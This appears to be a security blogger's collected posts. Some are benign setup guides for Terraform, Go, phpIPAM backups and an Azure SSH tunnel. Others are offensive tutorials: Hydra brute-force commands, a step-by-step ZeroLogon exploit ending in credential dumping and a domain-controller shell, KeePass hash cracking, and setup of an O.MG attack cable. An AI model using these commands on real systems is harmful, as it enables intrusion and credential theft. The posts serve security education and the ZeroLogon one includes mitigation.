Brute Forcing With Hydra

Brute force with hydra!

What is Hydra:

Hydra is a classic, fast network logon cracker that was created by Van Hauser. It is commonly used as a network logon cracker. The tool is great since it’s both fast and have built-in support for many different protocols.

You can find the code at:
https://github.com/vanhauser-thc/thc-hydra

How to install Hydra:

Hydra comes pre-installed with Kali Linux but if you are running another distributions you can simply install it from source by running the following commands

cd /opt
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
make install

Brute force vs dictionary attack:

The differences between a pure brute force attack and a dictionary attack from a technical point of view are pretty small. A pure brute force attack tests all possible combinations while a dictionary attack uses a word list with just selected combinations, usually default passwords and real passwords from data breaches. Running attacks with word lists are usually the first step to try in hope of finding the password quick. If the password is very strong pure brute force is the way to success.

Hydra requires you to use either a single password or a word list. It’s the same with usernames, either a single username or a word list with usernames.

A great feature that Hydra provides is that you can generate a word list if you are looking for pure brute force. It can be done with parameter -x. I will show you an example in the next section.

Common general parameters with examples:

You can find all parameters with -h but I describe some of the commons ones below.

-l = single username
Example : hydra -l admin

-L = list of usernames
Example: hydra -L /usr/share/wordlists/common-usernames

-p = single password
Example: hydra -p password1

-P = list of passwords
Example: hydra -P /usr/share/wordlists/common-passwords

-s = define port (if non standard for protocol)
Example: hydra -s 1337

-o = write result to a file instead of stdout
hydra -o result.txt

-x = Brute force mode
You can run hydra -x -h to get the full help menu for brute force mode but the the logic is
-x MIN:MAX:CHARSET

So if you for example know that the password requirements are minimum 6 characters and the password needs to contain uppercase, lowercase and numbers you would probably go for:
-x 6:8:aA1
This will generate a list of all possible password that are between 6-8 characters and contains uppercase, lowercase and numbers that will be used for your attack. Example:

hydra -x 6:8:aA1 -l root 192.168.0.1 ssh

Examples:

Some examples on how you can use Hydra for different protocols.

FTP:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.13.37 ftp -o ftp-result.txt
TELNET:
hydra -L /usr/share/wordlists/common-usernames -P /usr/share/wordlists/rockyou.txt 192.168.13.37 telnet
HTTP Forms:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.13.37 http-post-form “/hiddenlogin/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed”
SSH:
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.13.37 ssh -o ssh-result.txt
In this example I used the Hydra machine from TryHackMe.com to demonstrate the example.

I hope this guide was helpful. If you have any questions you can contact me on twitter (@tzusec).
// Rickard

How to Install Terraform in Linux

Terraform is an open-source software tool for Infrastructure as Code (IaC). The tool helps users to define and provision a cloud infrastructure with code. This guide will guide you on how to install Terraform on Linux.

You can either install Terraform from pre-compiled binary or you can also compile it from source and that this guide will help you with installing it from source.

The first step is to clone Terraforms repository from github. I prefer to install all my tools to /opt so thats what I do here but you can download to the location you want.

cd /opt
git clone https://github.com/hashicorp/terraform.git

Next we need to move into the terraform folder and compile the binary, to do this you will need to have golang installed, if you don’t have it already you can follow my guide on how to install Golang.

cd terraform
go install

The last step that I recommend you to do is to make sure that terraform is available in your PATH environmental variable.

First check view your PATH with

echo $PATH

Now we just need to move the terraform binary to one of the locations, I choose /usr/local/bin

mv /opt/terraform /usr/local/bin/

Now you have terraform installed. You can verify that is correctly installed by running:

terraform -help 
#or
terraform -version

The last thing I will recommend you to do is to enable tab completion so you can auto complete your terraform commands. You can do it by running the following command.

terraform -install-autocomplete

That’s it. Now you are ready to use this awesome IaC-tool. If you are interested in taking the Terraform Associate certification I recommend you to read my review of the exam.

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

ZeroLogon – How to Exploit and Mitigate

Information about vulnerability

The vulnerability I will discuss in this post it the famous ZeroLogon vulnerability(CVE-2020-1472). By exploiting the vulnerability any attacker with network access to domain controller can take complete control of a windows domain very quick and easy.

I will start off by showing you how easy you can exploit the vulnerability. Then I will continue by showing you how you can protect your domain controllers and finally I will show you how you can verify that your domain controllers have the correct fixes in place.

How to exploit the vulnerability

We will use the script by Risksense to exploit the vulnerability. To be able to run it you will need to have the Impacket library installed on your machine. If you don’t have it installed you can simply install it by following the steps below.

cd /opt/
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
pip3 install .
python3 setup.py install


We will then download the ZeroLogon script from Risksense.

cd /opt
git clone https://github.com/risksense/zerologon.git
cd zerologon/

Now it’s time to exploit. We need the name of the domain, the name of the DC and the IP address. For this example we will use the following information for this made up target:

  • Name of domain: LETMEIN
  • Name of DC: SECRET-DC
  • IP address of DC: 192.168.1.10

Run the script:

python3 set_empty_pw.py SECRET-DC 192.168.1.10

The DC should now have an empty string as its machine password. You can now use a tool of your choice to get out the info you want from the DC. You can for example use secretsdump.py that is included in the impacket library.

Dump credentials:
secretdump.py -just-dc LETMEIN/SECRET-DC\$192.168.1.10

Then press enter when prompted for password since it is supposed to be empty and voila. You should now see the user hashes from the NTDS.DIT.

Now you can easily find a Domain Admin like for example “LETMEIN\Administrator” and use another tool to create a shell. We will use another impacket tool for that, wmiexec.py. So all you need to do is to copy the hash that you got from secretdump.py.

Create shell to domain controller:
wmiexec.py LETMEIN\Administrator@192.168.1.10 -hashes *hashfromsecretdump.py*

You now have a shell on the domain controller. You own it and can do what you want.

Microsofts fix for this vulnerability

So, how can we now mitigate that a hacker exploits this in our own domain? Microsoft released information on how you can fix this. The first step is to install the patch and then set the FullSecureChannelProtection registry key to 1.

Instructions can be found on Microsofts website:
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Hopefully you already installed the patches back in august and applied the reg key the same day as Microsoft sent out the information.

How to verify the fix

How can you make sure that you did everything right while applying Microsofts fixes? To test it you can use the Zerologon tester script by Secura. The script also uses Impacket library to test if the vulnerability remains.

How to install:
cd /opt
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt


Run the script:
zerologon_tester.py SECRET-DC 192.168.1.10

That’s it, a super critical vulnerability that is extremely easy to exploit. Make sure that you always patch your stuff and do it quickly. ASAP is not enough 🙂

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

How to Backup and Restore phpIPAM

phpIPAM is an awesome IP address management application. I have used it for many years and really like it. In this guide I will show you how you can schedule automatic backups of your IPAM and how you easily can restore the database if something goes wrong.

Schedule automatic backups

  1. Create backup folder
    mkdir /mnt/backups/phpipam/db/
  2. Create a file for your credentials
    This is done to prevent the credentials to be stored in clear text inside crontab.
    touch ~/.msql.cnf
    vim ~/.msql.cnf
    #[mysqldump]
    #user=root
    #password=*yoursupersecretpassword*
  3. Restrict permissions to file
    chmod 600 ~/.msql.cnf
  4. Add to cron – backup the database every day at 23:00
    crontab -e
    0 23 * * * mysqldump --defaults-file=~/.msql.cnf phpipamdb01 > /mnt/backups/phpipam/db/phpipamdb01_$(date +"%F")_bak.sql

Remove old backups

You can easily remove your old backups (30 days+) by running the command below.
find /mnt/backups/phpipam/db/ -ctime +30 -delete

So what you can do is just adding that command to crontab like I showed you in the example above. But I personally don’t like that approach because if someone changes the date/time on your server there is a risk that all of the backups gets removed and you don’t want to risk that. To make sure that the time is configured correctly you can first verify that NTP is synchronized before you remove the old backup files. (This of course assumes that your NTP servers provides you with the correct time) You can create a simple bash script that will verify that NTP is being synchronized and if it’s not synchronized you will get notified by email:

  1. Create the script
    vim rm-old-backups.sh
    # #!/bin/bash
    # #Simple script to remove old phpIPAM backups if NTP i synced.
    # #By: Rickard Carlsson (@tzusec)
    # #IF NTP WORKS THEN REMOVE FILES
    # if (ntpstat | grep -qF "synchronized to NTP server")
    # then
    #_____find /mnt/backups/phpipam/db/ -ctime +30 -delete
    # else
    # ____mail -s "NTP-error - Backups won't be deleted" rickard@tzusec.com <<< 'NTP wasn't synced so no old backups were removed.'
    # fi

  2. Make the script executable
    chmod +x rm-old-backups.sh
  3. Verify that it works as expected
    Manually run the script to make sure that is works as you want.
  4. Add it to cron – remove old backups once every day at 23:30
    crontab -e
    30 23 * * * /root/rm-old-backups.sh

Restore database

  1. Locate the backup you want to use
    ls -l /mnt/backups/phpipam/db/
  2. Restore the database from the backup
    mysql -u root -p phpipamdb01 < /mnt/backups/phpipam/db/phpipamdb01_*DATE*_bak.sql

I hope this guide was useful for you. Reach out to me on twitter @tzusec if you have any questions.

Cracking KeePass Database

In this post I will describe how you can crack a KeePass Database file (.kdbx) in an easy way. Or to be correct we are not cracking the DB, we are cracking the password hash.

To demonstrate this I created a new database that I called “SecretDB.kdbx” and our mission will be to find out which master password I chose for the database.

Keepass-DB-file

To be able to crack the hash we will need to extract and save it and that can be done with the John the ripper utility tool “keepass2john“. It comes with Kali Linux so you don’t have to install it.

What you do to extract the hash is really simple, you just run:

keepass2john SecretDB.kdbx


You can also send the output to a file by adding “>” like I did in the screenshot below.

keepass2john SecretDB.kdbx > Keepasshash.txt

keepass2john-screenshot

We now have our hash ready to be cracked. In this example we will try to crack it using a dictionary and John the ripper. I used a modified version of rockyou.txt as dictionary. You can also use other great cracking tools like hashcat but I went with john here.

We run john and specify our custom wordlist with “–wordlist” parameter and then define our hash file.

john --wordlist=rockyou.txt KeepassHash.txt

We then just let it run for some time and as soon as we crack the hash it will be displayed. As you can see in the screenshot we did crack the hash and the password of this SecretDB.kdbx-database was “SuperSecretPassword2020”.

I hope you found this post useful and make sure to not use weak password for your database.

// Rickard

O.MG-CABLE – How To Get Started

This guide will help you get started with the O.MG-cable. When you open your package it should include three things:

  1. A card with instructions
  2. The programmer
  3. The OMG-cable
OMG-cable

If you read the instruction card you will see that you can find instructions on how to get started at https://o.mg.lol/setup. You will there find a link to the Github project where you can download the latest firmware that we will use to flash the cable.

Download the firmware by clicking on the link to the .zip-file. You will then need to unzip the file and you can do that by navigating to your download folder and run:
unzip O.MG_cable-Firmware_v1.4.0.zip

Then move into the new folder and you will see the following files.

folder

The next step is to plug in the programmer in your computer and then plug in the cable into the programmer. You are now ready to flash your cable and you do that by running the flash_linux:

./flash_linux

You will be able to either program it into Station or Access Point mode. In this case just go by default (AP mode) by pressing Enter. When the flashing is done you are ready to use the cable.

Flashing OMG

Disconnect the programmer from your computer and plug in your cable. Wait for ~60 seconds and then connect to the cable via WiFi with the default credentials above. When you are connected to the cables wireless network you can open a web browser and browse to http://192.168.4.1 and you will get to the UI.

Now you are ready to run your first scripts. Good luck!

// Rickard

How to use Undercover-mode in Kali Linux

Yesterday a new version of Kali Linux were released, Kali 2020.1. You can download it here. Make sure that you have read the release notes to make sure that you don’t break anything you don’t want.

Upgrade your existing machine:

  1. Run sudo apt full-upgrade -y
  2. Wait for the job to finish.
  3. Verify that you got the new version by running
    cat /etc/os-release
    Verify-installation

How to use undercover mode in Kali Linux 2020.1:
Undercover mode is a new feature for version 2020.1 that will help you hide that you are a super elite hacker when you are out in public by temporarily changing the desktop to look like a Windows 10 machine. I’m not sure I see the real use cases for this but it’s actually a funny feature. To use it you just need to run kali-undercover.

Kali undercover

After a few seconds you will see a Windows 10-like appearance, pretty cool.

Windows10-like-Kali-Linux

How to Install Golang in Kali Linux

golang

Golang (Go) is a programming language that are becoming more and more popular and I have seen many interesting tools that are written in Go. Since Go are not being installed by default in Kali Linux I thought that publishing a quick-start guide could be a good idea.

  1. Start by open your web browser and visit https://golang.org/dl/
  2. Download the latest version for Linux – “gox.xx.x.linux-amd64.tar.gz”
    Download page on golang.org
  3. Open your terminal and navigate to your downloads folder
    cd /root/Downloads
  4. Extract the files
    tar -C /usr/local/ -xzf go1.13.6.linux-amd64.tar.gz
  5. Add variables for GO by modifying “~/.bashrc”
    vim ~/.bashrc
    Add the following paths to the end of the file
    export GOPATH=/root/go-workspace
    export GOROOT=/usr/local/go
    PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
  6. Now we need to refresh the bashrc to get the updated variables
    source ~/.bashrc
  7. Now we just need to verify that everything is correct configured and we can do that by creating a simple ‘hello world’ program in Go.
    vim helloworld.go
    Add the following code to the file:
    package main
    import "fmt"
    func main() {
    fmt.Printf("Hello world!\n")
    }
    Then save the file and try to run the program:
    go run helloworld.go
    If everything was configured correctly you should see something like this:
    golang.helloworld
    hackerman1
    You are now ready to use Golang on your Kali Linux machine!

How to connect to Azure with SSH Tunneling

Have you just created your first Azure VM and are looking for a good, secure way to connect to you new machine without exposing more than necessary to the internet? Maybe you just want to run a few machines and don’t want to spend money on firewalls to configure VPN to your Azure Virtual Network (VNET)?

Connect-to-Azure-SSH-tunneling

In this post I will explain a method that can be used to connect to your machine securely without any cost. After reading this post you will know how you can set up a SSH tunnel to your machine so you only need to expose TCP port 22 to the internet. I will also show you how you can limit the access to that port by configuring a Network Security Group (NSG) in Microsoft Azure to only allow your own IP to connect. You will connect to the VM using Putty and either Google Chrome or Mozilla Firefox. We start off by configuring the NSG in Azure.

Configuring NSG in Azure:
The first thing that we need to do is to allow you to SSH to your machine and we do that by configuring the NSG. You want to modify the inbound security rule named ‘default-allow-ssh’ and you do that by clicking on ‘Inbound security rules’ in the left menu.

nsg

You should now add your public IP to the rule to allow you to connect from your home network. You probably know how to get your public IP but if you don’t know, one simple way is by visiting https://ipinfo.io and copy the address from there.

publicip

When you have the IP ready, click on the ‘default-allow-ssh’-rule to expand it and then add your IP to ‘Source IP addresses/CIDR ranges’ and press ‘Save’.

nsg2

The Azure configuration is now done. Lets move on to the Putty configuration.

Configuring Putty:
If you don’t have Putty installed you can download it from the official website and then just install it. After you have installed the software the first step is to run Putty and add the public IP of your Azure VM and select SSH port 22.

putty

Then navigate to SSH and check ‘Don’t start a shell or command at all’.

putty2

Move on by expanding SSH (+) and go to Tunnels. Add a forwarded port by choosing ‘Source port’. In this example we use port 1080. Select ‘Dynamic’ for destination and then press ‘Add’. Now you should see ‘D1080’ added above.

putty3

If you don’t want to configure these settings every time you want to use the tunnel you can save the session. That is done by going back to ‘Session’ and enter a name and then press ‘Save’.

putty4

Now the tunnel is ready and we just need to start it. Click on ‘Open’, enter your SSH credentials and press enter and the tunnel should be up and running.

Verify that the tunnel works:
You will probably want to make sure that the tunnel works as expected and we can verify that by configuring a simple HTTP server on the VM. In this example CentOS7 was used but it can be done on most machines.

Step one is to open another putty window and connect to you VM via SSH. Navigate to your home folder (cd /home) and create a directory (mkdir testfolder). Cd into that folder and create a testfile (touch text.txt). Then run the following command to run a python based HTTP-server on port 80.

sudo python -m SimpleHTTPServer 80

Your server will now listen for incoming connections on port 80. But since you don’t allow any connections to port 80 in the NSG you won’t be able to go directly to port 80. We need to send our HTTP traffic in the SSH tunnel to be able to reach it and we do that by configuring proxy settings in our web browser. This can be done in most of the common browsers and I will show you how to do it in Firefox and Chrome.

Chrome:
To configure proxy for Chrome you just right click on Chrome in the task bar and select ‘Properties’. You then need to add some run parameters.

chrome

The parameters you should add are:

--user-data-dir="%USERPROFILE%\proxy-profile" 
--proxy-server="socks5://127.0.0.1:1080"

Firefox:
For Firefox you just open up the browser, open the menu (1) and click on ‘Options’ (2).

firefox

Then you search for proxy and click on ‘Settings’

proxyfirefox

Select ‘Manual proxy configuration'(3) and then add ‘Socks Host 127.0.0.1 Port 1080′(4) and ‘SOCKS v5’ like in the example below.

firefox-proxy

After configuring the proxy settings you can just browse to the internal IP of your Azure VM. You can find the internal IP in the overview of the VM.

az-vm-private-ip

Then just browse to the IP ‘http://10.0.0.4’

result

Voila, you should now see the test file (test.txt) that you created earlier.

I really hope you found this guide useful, if you have any questions or reflections please send me a message on twitter.

/Rickard

Copyright © 2019